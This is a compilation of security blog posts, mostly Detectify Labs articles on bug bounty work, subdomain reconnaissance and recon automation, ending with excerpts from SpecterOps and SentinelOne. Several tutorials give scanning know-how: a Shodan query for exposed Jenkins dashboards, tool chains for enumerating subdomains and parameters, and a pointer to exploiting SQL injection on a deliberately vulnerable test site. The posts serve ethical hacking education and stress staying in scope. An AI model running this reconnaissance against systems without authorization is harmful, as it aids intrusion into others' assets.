Gehaxelt: Back in the day, Twitter was a really great resource for this once you followed the right people who frequently shared their findings and techniques. However, I feel like this has changed over time – I now see fewer write-ups on blogs, but on the other hand, there are many publicized bug bounty reports that you can read, understand, and learn something from. There are also other sources of knowledge, like YouTube or podcasts, but in the end, nothing beats hands-on experience.

Personally, I really enjoy reading HackerNews to get a community-curated feed of technical news related to IT security. In terms of keeping my skills and knowledge up-to-date, my go-tos are capture the flag (CTF) competitions. Solving security riddles with a team of like-minded people has been – and still is – an invaluable learning resource for me. Well-organized CTFs usually feature the latest vulnerabilities and hacking techniques, so you won’t be able to avoid them if you want to come in first place.

Talking to other people, collaborating, and attending conferences obviously also helps in staying up to date. Last but not least, as a Ph.D. candidate, I closely follow academic research, which can sometimes be applicable to bug bounties as well.

Detectify: What do you consider to be the biggest ethical challenges facing today’s ethical hackers and how do you address them in your work?

Gehaxelt: In regards to responsible disclosure and bug bounty programs, the steep competition is a big challenge. It can become quite demotivating if you’re unable to find vulnerabilities or only come across dupes – and this happens more often these days, since modern websites are more secure than they were 10 years ago.

It might be tempting to go out-of-scope and hack on endpoints that others haven’t yet looked at, but in doing so, you’ll void the Safe Harbor Agreement (SHA) that most bug bounty platforms have. You can avoid that if you stay inside the scope and keep true to a program’s rules. Ask the program owners if something is unclear.

Detectify: What are your favorite parts about working with Detectify Crowdsource?

Gehaxelt: Talking about abiding by the scope, Detectify can be a big help in this regard. Once a submitted module is validated and accepted, it will only be run against Detectify customers’ assets and endpoints, which Detectify is authorized to do. This frees up time for Crowdsource hackers to hack on other bug bounty targets – while Detectify runs your modules on other customers’ assets, you’ll have a greater reach, running your vulnerabilities against targets you might not otherwise have access to. It’s also great if you don’t have the time to do hours-long or all-night bug bounty hunts. You’ll receive a monetary reward every time your module produces a hit.

In a nutshell, what I like about Detectify’s Crowdsource system is that they do the work and I can do the research – it’s a win/win for everyone. 🙂

Get involved with Detectify Crowdsource

Detectify Crowdsource embraces the talents of ethical hackers like Gehaxelt. If this work aligns with your interests, we encourage you to learn more about the opportunities made possible by joining Crowdsource.

Additionally, you can keep up with our team’s activities to stay looped in on our Crowdsource hackers’ latest and most significant research.

The post Q&A with a Crowdsource hacker: Sebastian Neef a.k.a. Gehaxelt appeared first on Labs Detectify.

2022 Detectify Crowdsource Awards: Meet the winners

22 February 2023 at 08:48

Early each year, Detectify honors the top-performing ethical hackers within our Crowdsource community. To do so, we’ve put together our own “Oscars for hackers” – the Detectify Crowdsource Awards!

How the Detectify Crowdsource Awards work

The latest awards reflect our hackers’ achievements made during 2022. Our selection of awards, which we’ll take an in-depth look at below, is measured by a variety of factors: some awards are based on whether the winner has reached a certain number of points, while others take into account the number and quality of the submissions that the researcher has made.

We also have an award for individuals who have been exceptionally great to work with by using effective communication, being especially helpful, or consistently having a good attitude.

When it comes to the points mentioned above, here’s how they work:

  • Every time a new vulnerability is found by a module, it produces a hit.
  • Each hit results in points awarded to the researcher. Low severity vulnerabilities result in 1 earned point, medium vulnerabilities earn 10 points, high vulnerabilities earn 100 points, and critical vulnerabilities earn 500 points.
  • Our team measures the points earned by our ethical hackers on a quarterly and annual basis, and we also keep tabs on our hackers’ total points. You can check out our current 2023 leaderboard here.

Without further ado, let’s recognize each of 2022’s award-winning Crowdsource hackers!

Leaderboard Leader

First up is our Leaderboard Leader award. This title goes to the Crowdsource ethical hacker who has collected the most points during the entire year. Coming in at the top of the leaderboard during 2022 was melbadry9, who managed to earn a whopping 77,229 points!

In addition to this win, melbadry9 also hit 100,000 all-time points – another significant achievement on its own. Congratulations!

Substantial Submitter

Our Substantial Submitter, awarded for earning the highest number of valid submissions, goes to Geekfreak! Coming in at 87 valid submissions during 2022, this accomplishment is no small feat.

Superiority Submitter

Attaining the highest submission validity ratio in 5 or more submissions earns one of our hackers the title of Superiority Submitter. During 2022, we were impressed with the quality of the submissions from none other than Peter Jaric, whose submissions resulted in a 71% validity ratio. Kudos, Peter!

Fabulous Feedbacker

Detectify Crowdsource wouldn’t be where it is today without the feedback and support of our community members. For their constant willingness to help, great attitude, and proactive activity in our internal channels, we’d like to recognize Gehaxelt as 2022’s Fabulous Feedbacker!

Significant Start

The Significant Start award goes to a Crowdsource researcher who accumulated the most valid submissions during their first month in the Crowdsource community. Hardik, who had six valid submissions during his first 30 days in the community, is the much-deserved winner of this title.

Serial Submitter

Our Serial Submitter is a Crowdsource hacker who has had at least one valid submission during each month of the year. For his great contributions that come in on a consistent basis, we’re proud to present Geekfreak with this award.

Bullseye Bughunter

The coveted title of Bullseye Bughunter goes to a researcher with a validity ratio of 100%. This is of course very difficult to achieve, so we didn’t have a contributor who fit this award’s criteria for 2022. We’ve got high hopes for next year!


Team Trophy

Rounding out the 2022 Detectify Crowdsource Awards is our Team Trophy. This is an especially notable award, since it’s a title that is voted on by Detectify’s internal researchers. It goes to a Crowdsource researcher who has been a strong communicator and reliable, high-quality submitter. During 2022, we had not one but two hackers that stood out to our team’s researchers: j0v and tengeez. Congrats to you both!

We’d like to thank each and every member of our Crowdsource community for their valuable submissions – the Detectify Crowdsource Awards are just a small token of our appreciation for the important work that you do.

Want to know more about Crowdsource? We encourage you to meet the Crowdsource community and find out more about how the program works.

If you’re interested in getting involved, you can apply to hack with us today and become one of our ethical hackers who are passionate about securing modern technologies and making the Internet a safer place.

The post 2022 Detectify Crowdsource Awards: Meet the winners appeared first on Labs Detectify.

Advanced subdomain reconnaissance: How to enhance an ethical hacker’s EASM

13 January 2023 at 13:48

External Attack Surface Management (EASM) is the continuous discovery, analysis, and monitoring of an organization’s public-facing assets. A substantial part of EASM is the discovery of subdomains. Relying only on basic subdomain enumeration techniques can leave domains undiscovered, unmanaged, and vulnerable. Quality EASM provides sufficient visibility of assets and is achieved by finding and monitoring as many subdomains as possible. This blog aims to provide a few advanced subdomain reconnaissance techniques to enhance an ethical hacker’s EASM.

Enhancing the effectiveness of subdomain enumeration

Many EASM programs limit the effectiveness of subdomain enumeration by relying solely on pre-made tools. The following techniques show how ethical hackers can expand their EASM program beyond the basics and build the best possible subdomain asset inventory.

Discovering root domains

Subdomain enumeration is commonplace, but root domain enumeration is often ignored. Root domain enumeration can be performed in many ways, including:

  • Acquisitions
  • Crawling
  • Google dorking
  • Checking ASNs and IP ranges
  • Reverse Whois

Acquisitions

Searching for acquisitions can help discover assets previously owned by an acquired company. You can search for acquisitions by visiting Crunchbase, searching for an organization, and scrolling down to “Acquisitions” – Tesla’s Crunchbase page, for example, lists its acquisitions there.

Crawling

Going to known in-scope domains and using a web crawler can lead you to new subdomains and root domains owned by the same company. Just remember to confirm that the new domain is in scope.

Using a tool like katana on a target’s seed domain can help you find new subdomains. For example, running katana -u https://tesla.com will find auth.tesla.com, ir.tesla.com, shop.tesla.com, and more.


Google dorking

Using the power of Google can lead to a variety of findings. Try dorking for the company’s copyright using “© [COMPANY]. All rights reserved.” or using the allintext, allintitle, and allinurl tags, such as allintitle:"Yahoo".

Checking ASNs and IP ranges

If the organization has an ASN or their own IP range, there are tools such as Shodan and dnsx that can check these for domains. You can search an organization’s ASN details with the Hurricane Electric BGP toolkit to find ASNs and IP ranges that can be scanned to discover new assets. Searching for “Tesla”, for example, returns a number of ASNs and IP ranges to investigate.

Reverse Whois

WHOIS is a protocol that is mostly used for looking up ownership information of domains. Normally, you provide a domain name and a WHOIS server will respond with the domain owner’s details, but there are services that allow you to do a reverse WHOIS lookup, where you provide an organization name or email address, and it will return all of the associated domains.

This information has a very low false positive rate and can yield thousands of domains for larger companies. Some of the more well-known reverse whois services are Whoxy, ViewDNS, and WhoisXMLAPI. They all offer APIs that will make it easy to automate the process.

Certificate transparency

Certificate transparency logs are a great way to find more subdomains that other methods may not discover. Here’s how it’s done:

  1. Go to the organization’s main site and find the certificate organization name.
  2. Take the organization name and query crt.sh for that organization.
  3. Take all common names found for that organization, and query those too. I used *.dev.ap.tesla.services here as an example.

This process discovered pages of subdomains that other methods could’ve missed. If you want to see a walkthrough of this method, check out Nahamsec’s video.

Permutations

Finding subdomains with permutations is a strategy that has gained a lot of traction recently and is something I have had a lot of success with. The basic idea is that we take subdomains we know to exist and then use them as seeds to generate permutations. For example, if app.example.com exists, we could test for the following:

  • app-staging.example.com
  • app-dev.example.com
  • app2.example.com

There are many tools for automating asset discovery through subdomain permutations, such as altdns, ripgen and regulator. I recommend testing all the tools and seeing which one suits you.
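As a minimal sketch of the idea (separate from the dedicated tools above), generating candidates from known seeds can be as simple as the following; the seed list and suffixes are examples only:

// Generate permutation candidates from known subdomains; real wordlists of
// suffixes/prefixes are much larger than this example.
const seeds = ['app.example.com', 'api.example.com'];
const suffixes = ['staging', 'dev', 'test', '2'];

const candidates = seeds.flatMap((seed) => {
  const [label, ...rest] = seed.split('.');
  const domain = rest.join('.');
  return suffixes.flatMap((s) => [
    `${label}-${s}.${domain}`,   // e.g. app-staging.example.com
    `${label}${s}.${domain}`,    // e.g. app2.example.com
  ]);
});

// Resolve the candidates (for example with dnsx or massdns) to see which exist.
console.log(candidates.join('\n'));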

Continuous Monitoring

Continuous monitoring is essential because external attack surfaces are constantly changing. The key to effective EASM is that you are monitoring changes in as close to real-time as possible. Use automation to routinely check for:

  • New subdomains from passive sources
  • New subdomains from bruteforcing
  • New root domains
  • Updated information about known subdomains (which ones resolve, open web ports, etc.)

Summarizing advanced subdomain reconnaissance

This blog has offered helpful techniques for advanced subdomain reconnaissance that you can add to your EASM toolbelt. There are many data sources to evaluate when assessing an organization’s attack surface. As an ethical hacker, the more data sources you can include, the more effective your EASM will be. As I have mentioned in previous articles, organizations themselves should start thinking like us ethical hackers when it comes to assessing their internet-facing assets and continuously monitoring their growing attack surface. As this blog discusses, root domain enumeration can be performed in many ways, including:

  • Acquisitions
  • Crawling
  • Google dorking
  • Checking ASNs and IP ranges
  • Reverse Whois

Why not give it a try?

Additional reading

DNS Hijacking – Taking Over Top-Level Domains and Subdomains
Determining your hacking targets with recon and automation
[New research] Subdomain takeovers are on the rise and are getting harder to monitor


Written by:
Gunnar Andrews

My online alias is G0lden. I am a hacker out of the midwest United States. I came into the hacking world through corporate jobs out of college, and I also do bug bounties. I enjoy finding new ways to hunt bugs and cutting-edge new tools. Making new connections with fellow hackers is the best part of this community for me!

The post Advanced subdomain reconnaissance: How to enhance an ethical hacker’s EASM appeared first on Labs Detectify.

Detectify Crowdsource offers ethical hackers more than continuous bounties

27 December 2022 at 14:40

Detectify Crowdsource is a platform for ethical hackers to scale the impact of their bug hunting through automation. Ethical hackers submit vulnerabilities they find in widely used technologies that are then automated and made available to thousands of Detectify customers around the globe to enable them to secure their external attack surface. Each time a vulnerability is found in a unique customer asset, a bounty is paid to the ethical hacker who submitted the vulnerability.

Earlier this year, we facilitated a survey to learn more about our community of elite ethical hackers. We have subsequently used many of these insights to inform our product roadmap in 2022 and as we plan for next year. We asked a variety of questions, ranging from how many hours per week they spend hacking to what motivates them to keep hacking. We had nearly 200 ethical hackers participate in our survey, most of whom are members of Detectify Crowdsource. We summarized a few learnings from our survey to share with those interested in hacking with Detectify Crowdsource.

Over 50% of our users are experienced security engineers

Detectify Crowdsource challenges ethical hackers to find vulnerabilities in technologies used most frequently to build web applications. It was no surprise to us to learn that most survey respondents primarily hack technologies associated with web apps. However, we were pleased to learn that over 50% of our community members work as security engineers in their professional lives.

We also learned that 30% of our community of ethical hackers have 5 or more years of experience as ethical hackers. This not only means that Detectify’s EASM customers benefit from vulnerabilities found by experienced security engineers, but that our members also get to learn from other skilled members. We set a high bar to join our community and we are glad to see this reflected in our survey results.

Ethical hackers join Detectify Crowdsource to earn and learn

We’re pleased to learn that we have such a talented community of ethical hackers. However, we know it takes more than a compelling reward system to keep our members engaged. While 34% of survey respondents said that earning money is their top reason for hacking, a whopping 36% claimed that they hope to advance their career and learn through ethical hacking.

There are many resources to improve your ethical hacking skills, and while we may be a little biased about some of our own content, we’ve listed some of our favorite resources:

Our EASM solution is powered by ethical hackers – we take that seriously

Detectify’s EASM platform tests our customers’ Internet-facing assets for vulnerabilities we’ve crowdsourced from our community of ethical hackers. Each time a vulnerability is discovered in a unique customer asset, the reporter of that vulnerability earns a bounty (with no limit on earnings so long as that vulnerability is present in our customers’ attack surfaces). From day 1, we have prioritized support of our community – from quickly resolving issues to answering questions. We were reminded of how important a responsive team is: nearly 40% of survey respondents said that a responsive team is what makes a bug bounty platform most attractive.

Scale the impact of your next vulnerability finding with Detectify Crowdsource

Wondering how you can join our community of leading ethical hackers? Try out our signup challenge to see if you have the experience needed to join Detectify Crowdsource here.

The post Detectify Crowdsource offers ethical hackers more than continuous bounties appeared first on Labs Detectify.

Determining your hacking targets with recon and automation

7 December 2022 at 09:50

Why picking targets is so important

Many ethical hackers struggle because they are hacking the β€œwrong” types of targets for them. This is especially true for independent researchers or bug bounty hunters. These endeavors only pay for results and findings, not the time invested. Ethical hackers with a good return on their time ensure that their efforts are focused on hacking targets they are comfortable with. A target that is right for you as an ethical hacker could be any of the following:

  • A target using technology or framework you are an expert in.
  • A website or asset that appears old or deprecated.
  • Older versions of a released product that are still deployed.
  • Web applications that accept a large amount of user input.
  • Hacking targets that have had vulnerabilities in the past that you are an expert in.

This list could go on, but the idea is that you should always try hacking targets where you already have an advantage. So how do you find and recognize these targets among a massive list of candidates? The answer is recon and automation!

When recon and automation are an advantage for hacking targets

Recon and automation can be powerful tools for ethical hackers. Recon is the step in which asset discovery takes place. The better you perform your recon, the better the results of your hacking are likely to be. There are many ways that recon can be an advantage, such as:

  • Finding hacking targets other ethical hackers missed.
  • Creating a database of assets that can continuously be hacked or scanned.
  • Fingerprinting assets to find technology/frameworks you know.
  • Creating a system to learn about new assets that get deployed.

Finding any of the things above through recon will increase your chances of success when you hack. With some of these tricks, you can take your hacking to the next level and ensure you are only hacking the targets that are best for you.

When recon is a disadvantage for hacking targets

A word of warning when it comes to recon and automation. While it is true that finding more lucrative assets is a good thing, it’s not the end game. Ethical hackers often get stuck doing so much recon work that they never actually hack the targets. Like all things, there is a balance between reconnaissance and hands-on hacking. If you find yourself struggling with this balance, here are some tips:

  • Only use recon to find the information you actively use in your hands-on hacking.
  • Automate more of your recon tasks.
  • Minimize the targets you are hacking at one time.

Utilizing recon correctly can exponentially increase the returns of your hacking efforts, but getting stuck in the recon phase or hit with information overload can actually hold you back. Balance is key!

Digging for gold where others aren’t

Using recon to find juicy hacking targets is like digging for gold. To find gold, you have to dig where others are not. For example, many bug bounty hunters use the same subdomain enumeration tools, sources, and techniques as everyone else. Only a few dig much deeper than this. To go one step further, you can, for example, try fuzzing, brute forcing, or generating permutations. The deeper you go, the more likely you are to uncover assets that are untouched by others.

"Bug hunters can find more gold while digging by performing recon continuously."

Another way bug hunters can find more gold while digging is by performing recon continuously. Almost every ethical hacker performs recon once, when they first engage the target, and never does it again. But imagine the target deploys a new domain the very next day: you would never know the domain exists without continuous recon. This is a perfect use case for automation. Writing scripts that continuously run recon against your target and report new findings is relatively easy, and the benefits are well worth the work. Any new domains found are always worth a look if you are confident you stumbled across them first. It is like digging for gold in an untouched cave!
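
As a minimal sketch of what such a script could look like (assuming subfinder is installed and known_subs.txt holds results from previous runs; names and the target are placeholders), a scheduled job can diff a fresh enumeration against the last one and report anything new:

#!/usr/bin/env bash
# Minimal continuous-recon sketch: compare a fresh subdomain enumeration
# against the previous results and report anything new.
TARGET="example.com"
subfinder -d "$TARGET" -silent | sort -u > current_subs.txt
# Lines present in current_subs.txt but not in known_subs.txt are new.
comm -13 <(sort -u known_subs.txt) current_subs.txt > new_subs.txt
if [ -s new_subs.txt ]; then
    echo "New subdomains found for $TARGET:"
    cat new_subs.txt
fi
# Merge today's results into the known set for the next run.
cat current_subs.txt known_subs.txt | sort -u > known_subs.tmp && mv known_subs.tmp known_subs.txt

Run it from cron (or any scheduler) and pipe new_subs.txt to whatever notification channel you prefer.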

More gold to dig

So far, we have talked mostly about subdomain recon, but it doesn’t end there. Recon can be used to find things that other ethical hackers have yet to find, allowing you the chance to test them first. Some of these things are:

  • Hidden endpoints (ex: unlinked endpoints, older versions of APIs, etc.)
  • Hidden parameters (ex: admin=true, debug=true, etc.)
  • Comments from developers
  • Virtual hosts
  • Secrets (ex: API keys)

There are many things that recon can uncover. And thankfully, many ethical hackers have already made tools to help look for all of these things. Here are some examples (sample invocations follow the list):

  • FFUF (finding hidden endpoints)
  • Arjun (finding hidden parameters)
  • Gobuster (searching for virtual hosts)
  • Trufflehog (Secrets finder!)
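
As a rough sketch, typical invocations of these tools might look like the following (the wordlists, target URLs, and repository below are placeholders, and exact flags may vary by version):

# Hidden endpoints with FFUF (FUZZ marks the injection point in the URL).
ffuf -u https://target.example/FUZZ -w endpoints-wordlist.txt
# Hidden parameters with Arjun.
arjun -u https://target.example/page.php
# Virtual hosts with Gobuster.
gobuster vhost -u https://target.example -w subdomains-wordlist.txt
# Secrets in a repository with Trufflehog.
trufflehog git https://github.com/example/repo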


Examples of using recon automation to uncover hacking targets


Finding technologies with Shodan

Shodan can be used to find all kinds of good targets with technology that you like or enjoy hacking on. There are a lot of repositories on GitHub for Shodan dorks if you want to check them out. A really simple example is looking for Jenkins server dashboards that are publicly available:

  1. Browse to shodan.io
  2. To find Jenkins dashboards, try the query: x-jenkins 200
     Note: If you have a Shodan subscription, you can use other filters or tags to narrow down results even further.
  3. From here, you can poke around the results and check the domains/IPs against known bug bounty targets (Solid list of all public targets HERE)
  4. If you find one in scope for a program, hack away!

This is a very small example of how Shodan can be used to find hacking targets that are a good fit for you. The example above uses the search engine in the browser, but this could also be automated with the Shodan CLI!
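
As a small sketch of that automation (assuming the shodan CLI is installed and initialized with your API key), the same dork can be run from the command line:

# One-time setup with your API key, then run the Jenkins dork from the CLI.
shodan init YOUR_API_KEY
shodan search --fields ip_str,port,hostnames "x-jenkins 200"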

Finding web hacking targets with httpx

Httpx is an HTTP toolkit created by Project Discovery. Part of this toolkit is the ability to run technology detection using known fingerprints. In fact, right in the readme file of the repository is an example using their subfinder tool and httpx to quickly enumerate subdomains for a target, then grab their status codes and HTTP titles, and run technology detection:

subfinder -d detectify.com -silent | httpx -title -tech-detect -status-code

This example is very basic, yet surprisingly quick and effective for generating a list of a target’s domains along with some useful information about them. Look at the titles, status codes, and technology detection results, and from there you should be able to discern which domains are best for you.

Using Arjun to find parameters

Arjun can be used to find all available parameters on a page. This can be useful in many situations. This example is going to show a purposely vulnerable page.

  1. Browse to http://testphp.vulnweb.com/listproducts.php
  2. You will notice a SQL error immediately. This is an obvious signal that an SQL injection could be possible.
  3. Point Arjun at the page (a sample command follows this list).
  4. Here you can see that the tool found three possible parameters.
  5. Try the artist parameter (http://testphp.vulnweb.com/listproducts.php?artist=test). You will notice the SQL error message changes based on what you put in the artist parameter. We are getting closer.
  6. From here, feel free to exploit the SQL injection by hand or use sqlmap for help.
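
As a minimal sketch of step 3 (assuming Arjun is installed), pointing it at the page looks like this:

# Enumerate the parameters accepted by the target page.
arjun -u http://testphp.vulnweb.com/listproducts.php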

This is a small example showing the power of enumerating parameters. Finding all the parameters available to you will open up your attack surface as much as possible. Also, as with the other examples, this can be automated. Below is a small tool chain using Subfinder, httpx, hakrawler, and Arjun:

subfinder -d detectify.com -silent | httpx -silent | hakrawler -u | grep "detectify.com" > targets.txt && arjun -i targets.txt -oJ data.json

The above tool chain finds the subdomains of a target, uses httpx to determine which of those domains have open, browsable web ports, spiders those domains with hakrawler to find all the pages, and finally runs Arjun on each page to enumerate its parameters. When this finishes running, you should have a good list of the pages on a web application, as well as all of the parameters for each page. If you want to take this even further with automation, I would recommend filtering your parameters using something like GF and some patterns (see the example below).
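
As a rough sketch of that last filtering step (assuming gf and a community pattern set such as Gf-Patterns are installed, and that targets.txt is the output of the chain above), you could pull out URLs whose parameters look interesting for SQL injection testing:

# Keep only URLs whose parameters match gf's "sqli" pattern.
cat targets.txt | gf sqli > sqli-candidates.txt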

Conclusion

Recon can be one of the strongest tools in a hacker’s tool belt and is a great way to discover hacking targets. I hope something in this post helps you realize there might be a gap in your recon you can fill or that it may be time to automate some of your recon methodologies. I hope you can take something from this and use it to glean more findings. You can easily keep up with new techniques to find hidden assets and hacking targets by following the hacker community on Twitter, Slack, and other communication platforms.


Written by:
Gunnar Andrews

My online alias is G0lden. I am a hacker out of the midwest United States. I came into the hacking world through corporate jobs out of college, and I also do bug bounties. I enjoy finding new ways to hunt bugs and cutting-edge new tools. Making new connections with fellow hackers is the best part of this community for me!

The post Determining your hacking targets with recon and automation appeared first on Labs Detectify.

Should you learn to code before you learn to hack?

30 November 2022 at 15:10

You will find a common pattern if you read blog posts or watch interviews with some of today’s top ethical hackers. When asked if coding knowledge is needed for hacking, the answer is almost always the same: It’s possible to become a great hacker without coding knowledge, but having coding experience makes it a whole lot easier. Knowing how software is built in theory makes it easier to break. This blog post will discuss some of the advantages that coding knowledge can give you when you start hacking.

Writing your own tools

Ethical hackers have created many tools for specific purposes to help them with their hacking. You can do the same. By creating your own tools, you know exactly what each tool is doing.

Here’s a simple process I follow when creating my own tools:

Find a gap in currently available tooling.
This could be a tool that is outdated or deprecated, or an area that still lacks a good solution. Find a spot where your knowledge of the topic and your programming skills can shine.

Create your updated or new tool.
If you’re updating an existing tool, this may look more like forking a GitHub repo and changing/adding code. If you are creating a brand new tool, this might look like creating your new repository and starting from scratch.

Test your new tool against local targets.
This is the easiest way to determine if your new tool is working as expected. Spending more time in the testing phase will benefit you in the long run.

Deploy your tool against real targets.
Pick some bug bounty targets or something you have permission to hack and deploy your shiny new tool against it.

Open source it (or don’t!).
Whether you share your tool with the community or keep it to yourself for a competitive edge is entirely up to you.

Insider knowledge

Knowing the internal details of the software you’re hacking is like using cheat codes in video games. It changes the game entirely. An ethical hacker with development experience can make educated guesses about how a feature is implemented in the backend and what vulnerabilities are likely to have been introduced. Without development experience, an ethical hacker spends more time shooting in the dark and relying solely on probe results to determine suspicious behaviors.

"Knowing the internal details of the software you’re hacking is like using cheat codes in video games."

For this reason, when approaching a new target as an ethical hacker with development experience, it is advantageous to focus on assets that use languages, frameworks, and technologies you’re familiar with. This will ensure that you are approaching the target with an advantage. There are many ways to find these targets:

  • If you’re hacking on a bug bounty platform, many of them list the technologies used by each target within the bounty brief.
  • Use technology fingerprinting tools such as wappalyzer or httpx.
  • Use search engines like Google and Shodan.

Source code review

Some of the juiciest bugs are very difficult to uncover from pure black-box testing. Reviewing source code offers more insight and a fresh perspective on applications, which can yield more bugs. Someone with coding experience will always be more adept at uncovering vulnerable code than someone without coding experience. This is especially true if you have experience with the language or framework being used.

There are many ways to find source code to review, including:

  • Reviewing open source code (of course!)
  • Decompiling Java
  • Reviewing containerized software in public registries

Some examples of these methods leading to high/critical severity CVEs are CVE-2020-13379 (found by Justin Gardner) and CVE-2021-22054 (found by Keiran Sampson, James Hebden, and Shubham Shah). These examples are great to read through to get an idea of the kinds of sources and sinks ethical hackers look for in modern software.

Automation

Companies and researchers alike are trying to automate as much as possible. In theory, automating the menial tasks involved with hacking only makes you more efficient. As you may have guessed, one of the best new ways to flex your programming skills is to automate steps of the hacking methodology. This can look very different depending on the task you are trying to automate. I would recommend thinking about it using the following steps:

What does the input data look like?
Are you taking info from stdin on a command line or pulling data from a database? What format is the input in? (ex: JSON, text, CSV, etc.)

How should your automation be ingesting this data to produce results?
Is it making requests with this data, decoding the data, or maybe using the data for some type of analysis?

What does the resulting output data look like, and where is it stored?
This looks very similar to step #1. What format is it, and where is it being stored?

How will you deploy this automation in a way that can scale to handle enough targets?
(ex: Are you using VPS servers? Will there be one big script or a bunch of smaller ones?)

The language or framework you use is up to you. If you follow the above steps to use your programming knowledge to start automating your tasks, I can promise you that you will see an improvement in your results!
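
As a minimal sketch of these four steps in shell form (assuming httpx is installed; file names and the cron schedule are placeholders), a tiny probing automation might look like this:

#!/usr/bin/env bash
# Step 1: input  - newline-separated domains read from targets.txt
# Step 2: ingest - probe each domain with httpx for title, status code, and tech
# Step 3: output - JSON lines appended to results.json for later analysis
# Step 4: deploy - schedule on a VPS, e.g. via cron: 0 */6 * * * /opt/recon/probe.sh
httpx -l targets.txt -silent -title -status-code -tech-detect -json >> results.json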

Resources to learn more

Whether you have prior programming knowledge and this blog has convinced you to utilize it in your hacking adventures, or you are now convinced it is time to learn some programming, here are some resources to get you started:

If you have the programming knowledge and are ready to use it to your advantage, I recommend you grab some source code from a bug bounty program, an open-source project, or otherwise publicly available software and start hacking. I hope this has encouraged some developers to try flexing those ethical hacker muscles. I think you will find that it can be a very fun transition to try breaking software instead of building it. Many developer-turned-hackers would love to welcome you to the club. Have fun and happy hacking!


Written by:
Gunnar Andrews

My online alias is G0lden. I am a hacker out of the midwest United States. I came into the hacking world through corporate jobs out of college, and I also do bug bounties. I enjoy finding new ways to hunt bugs and cutting-edge new tools. Making new connections with fellow hackers is the best part of this community for me!

The post Should you learn to code before you learn to hack? appeared first on Labs Detectify.

The SQL Server Crypto Detour

16 April 2025 at 23:01
One of the things that I love about my role at SpecterOps is getting to dig into various technologies and seeing the resulting research being used in real time. This post will explore one such story of how I was able to go from a simple request to recover credentials from a database backup, to reverse engineering how SQL Server encryption works, to finding some new methods of brute-forcing database encryption keys, and finally to identifying a mistake in ManageEngine’s ADSelfService product which allows encrypted database backups to reveal privileged credentials.

Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries

Executive Summary

  • In recent months, SentinelOne has observed and defended against a spectrum of attacks from financially motivated crimeware to tailored campaigns by advanced nation-state actors.
  • These incidents were real intrusion attempts against a U.S.-based cybersecurity company by adversaries, but incidents such as these are neither new nor unique to SentinelOne.
  • Recent adversaries have included:
    • DPRK IT workers posing as job applicants
    • ransomware operators probing for ways to access/abuse our platform
    • Chinese state-sponsored actors targeting organizations aligned with our business and customer base
  • This report highlights a rarely-discussed but crucially important attack surface: security vendors themselves.

Overview

At SentinelOne, defending against real-world threats isn’t just part of the job, it’s the reality of operating as a cybersecurity company in today’s landscape. We don’t just study attacks, we experience them firsthand, levied against us. Our teams face the same threats we help others prepare for, and that proximity to the front lines shapes how we think, and how we operate. Real-world attacks against our own environment serve as constant pressure tests, reinforcing what works, revealing what doesn’t, and driving continuous improvement across our products and operations. When you’re a high-value target for some of the most capable and persistent adversaries out there, nothing less will do.

Talking about being targeted is uncomfortable for any organization. For cybersecurity vendors, it’s practically taboo. But the truth is security vendors sit at an interesting cross-section of access, responsibility, and attacker ire that makes us prime targets for a variety of threat actors, and the stakes couldn’t be higher. When adversaries compromise a security company, they don’t just breach a single environment – they potentially gain insight into how thousands of environments and millions of endpoints are protected.

In the past several months alone, we’ve observed and defended against a spectrum of attacks ranging from financially motivated crimeware to tailored campaigns by advanced nation-state actors. They were real intrusion attempts targeting a U.S.-based cybersecurity company – launched by adversaries actively looking for an advantage, access, or leverage. Adversaries included DPRK IT workers posing as job applicants, ransomware operators probing for ways to access/abuse our platform, and Chinese state-sponsored actors targeting organizations aligned with our business and customer base.

We are certainly not the only ones facing these threats. In the spirit of furthering collective defenses and encouraging further collaboration, we’re pulling back the curtain to share some of what we’ve seen, why it matters, and what it tells us about the evolving threat landscape – not just for us, but for every company building and relying on modern security technology.

DPRK IT Workers Seeking Inside Jobs

One of the more prolific and persistent adversary campaigns we’ve tracked in recent years involves widespread campaigns by DPRK-affiliated IT Workers attempting to secure remote employment within Western tech companies– including SentinelOne. Early reports drew attention to these efforts and our own analysis revealed further logistical infrastructure to launder illicit funds via Chinese intermediary organizations. However, neither gave a sense of the staggering volume of ongoing infiltration attempts. This vector far outpaces any other insider threat vector we monitor.

These actors are not just applying blindly – they are refining their process, leveraging stolen or fabricated personas, and adapting their outreach tactics to mirror legitimate job seekers in increasingly convincing ways. Our team has tracked roughly 360 fake personas and over 1,000 job applications linked to DPRK IT worker operations applying for roles at SentinelOne – even including brazen attempts to secure positions on the SentinelLabs intelligence engineering team itself.

Public reporting of DPRK IT workers applying to threat intelligence positions

Engagement and Adversary Interaction

Instead of staying passive, we made a deliberate choice towards intelligence-driven engagement. In coordination with our talent acquisition teams, we developed workflows to identify and interact with suspected DPRK applicants during the early phases of their outreach. This collaboration was key. By embedding lightweight vetting signals and monitoring directly into recruiting processes – without overburdening hiring teams – we were able to surface anomalous patterns tied to DPRK-affiliated personas, which were piped directly into our Vertex Synapse intelligence platform for analyst review.

Our attempted interactions offered rare insights into the craftiness and persistence of these infiltration campaigns – particularly the ways in which adversaries adapt to the friction they encounter.

Inbound DPRK referral request to strategic employees

The attackers are honing their craft beyond the job application and recruitment process. An operation of this scale and nature requires a different kind of backend infrastructure, such as a sprawling network of front companies to enable further laundering and logistics.

DPRK IT Worker Front Company Network (November 2024)

Helping Hiring Teams Help Us

A key takeaway in working on this investigation was the value of intentionally creating inroads and sharing threat context with different teams not normally keyed into investigations. Far from being unaware, recruiters already had an intuitive understanding of the situation and had been filtering out and reporting 'fake applicants' within their own processes.

We brought campaign-level understanding that was combined with tactical insights from our talent team. The payoff was immediate. Recruiters began spotting patterns on their own, driving an increase in early-stage escalation of suspicious profiles. They became an active partner that continues to flag new sightings from the frontlines. In turn, we are codifying these insights into automated systems that flag, filter, enrich, and proactively block these campaigns to lower the burden on our recruiters and hiring managers, and reduce the risk of infiltration.

Make cross-functional collaboration standard operating procedure: equip frontline business units – from recruiting to sales – with shared threat context and clear escalation paths so they can surface anomalies early without slowing the business. Codifying insights with automation will consistently bring bi-directional benefits.

The DPRK IT worker threat is a uniquely complex challenge – one where meaningful progress depends on collaboration between the security research community and public sector partners.

Ransomware Group Capability Development

Financially motivated threat actors frequently target enterprise security platforms – products designed to keep them from making money – for direct access. SentinelOne, like our peers, is no exception. While uncomfortable, this is a reality the industry faces continually and should handle with both transparency and urgency.

Forum post offering security product access

